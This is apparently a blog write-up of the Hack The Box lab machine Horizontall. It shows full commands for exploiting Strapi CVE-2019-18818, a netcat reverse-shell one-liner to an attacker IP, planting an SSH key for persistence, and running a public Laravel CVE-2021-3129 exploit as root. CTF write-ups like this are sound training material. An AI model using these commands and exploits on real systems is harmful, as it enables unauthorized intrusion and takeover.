Introduction
Horizontall is an “easy” rated
CTF Linux box on Hack The Box platform. The box covers initial compromise by
exploiting Strapi RCE vulnerability and escalating privileges by tunneling an
internal application (Laravel) to local machine and running a PoC exploit on
Laravel v 7.4.18
Table of Content
Network Scanning
·
nmap
Enumeration
·
Subdomain
enumeration using wfuzz
·
Strapi
password reset exploit
Exploitation
·
Exploiting
strapi CVE-2019-18818 to gain a reverse shell
·
Initial
information gathering
·
Setting
up my SSH key in victim’s authorized_keys file
Privilege Escalation
·
Tunneling
internal website to our system
·
Exploiting
Laravel CVE-2021-3129 to snag root flag
Let’s begin
Network Scanning
First, we will run an nmap
scan on the victim machine
nmap -sV -sC -Pn 10.129.149.92
Enumeration
Since, there was a website
running on port 80, we added the address in our hosts file for resolution.
We tried to look for
exploitable vectors on the website itself but couldn’t find any which indicated
that we need to enumerate directories.
Even directories enum didn’t
yield any results so we tried to enumerate subdomains.
wfuzz -w
/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H
"Host: FUZZ.horizontall.htb" --sc 200 10.129.149.92
This returned back an
interesting subdomain called api-prod
We add this subdomain in hosts
file and try to open the website.
echo
"10.129.149.92
api-prod.horizontall.htb" >> /etc/hosts
It seemed like a plain website
with no vectors again and thus, we tried directory enumeration. We found a
directory /admin. Upon checking the components that made this website, we found
the title to be strapi.
whatweb
http://api-prod.horizontall.htb/admin/
We observed the response in
burp and noticed strapi version to be 3.0.0-beta 17.4
Exploitation
Searchsploit result showed us
an exploit for the given version was available. This version was afflicted with
CVE-2019-18818. This vulnerability allows an
attacker to reset the admin password without needing authentication tokens. You
can read more about the vulnerability here. We downloaded the exploit
using searchsploit.
searchsploit -m
50239
Running the exploit was quite
simple, just passing the URL as an argument sufficed.
python3 50239.py http://api-prod.horizontall.htb
As you could see, the password
was reset. One could login using this. AS you can see, in the response, we can
confirm that the account is an admin.
However, the exploit also
opened an option to run remote commands on the server! After a lot of tries, we
found a reverse shell that seemed to be working.
rm -f /tmp/f;mknod
/tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.10 1234 >/tmp/f
We had already set up a
listener on port 1234 which had now received a new session. We converted this
into a proper teletype using python.
nc -nlvp 1234
python3 -c 'import
pty;pty.spawn("/bin/bash")'
Privilege Escalation
Upon looking around this
server, we observed a few unhelpful things. Finally, a netstat command gave us
the path forward. The server seemed to be listening on port 8000. This could
mean an internal service is running.
netstat -plant
Since, there is no PID
associated with the port, it means that a service was running. Best bet is a
website. Another interesting thing was that the user strapi had rwx permissions
on .ssh directory.
cd ~
ls -la
pwd
cd .ssh
Therefore, the plan forward
is:
1. Add my own SSH public key in
the server’s authorized_keys
2. Start a TCP tunnel to forward
port 8000 to my local system
3. Explore the service on port
8000.
For this, I generated a new
SSH key pair using ssh-keygen command
I then copied my id_rsa.pub
key as authorized_keys and started a web server using python.
ssh-keygen
cp id_rsa.pub
authorized_keys
python3 -m
http.server 80
I then downloaded this file in
my server using wget in the directory ~ /.ssh
wget http://10.10.16.10/authorized_keys
As it had got copied, we could
now run an SSH tunnel and forward port 8000 to our local system’s port 8000
using the command:
ssh -i id_rsa -L
8000:localhost:8000 strapi@10.129.149.92
Now, upon traversing local
port 8000 in the web browser, we observed that Laravel version 7.4.18 was
running.
http://localhost:8000
This version is vulnerable to CVE-2021-3129. This vulnerability allows an
attacker to execute code because of an insecure implementation of
file_get_contents() function. A PoC is available on github (ref here) which we cloned and ran.
git clone
https://github.com/nth347/CVE-2021-3129_exploit.git
cd
CVE-2021-3129_exploit
chmod +x
exploit.py
./exploit.py
http://localhost:8000 Monolog/RCE1 id
./exploit.py
http://localhost:8000 Monolog/RCE1 "cat /root/root.txt"
And as you can see, the
application was owned by root and thus we are able to execute commands as root.
This is how we escalated our privileges and snagged the root flag.
Conclusion
The lab offers practical
understanding of googling, understanding, finding public exploits and running
them to exploit a server. In our humble opinion, the website is suitable for
beginners or students practising for OSCP. Hope you liked the article. Thanks
for reading.
0 comments:
Post a Comment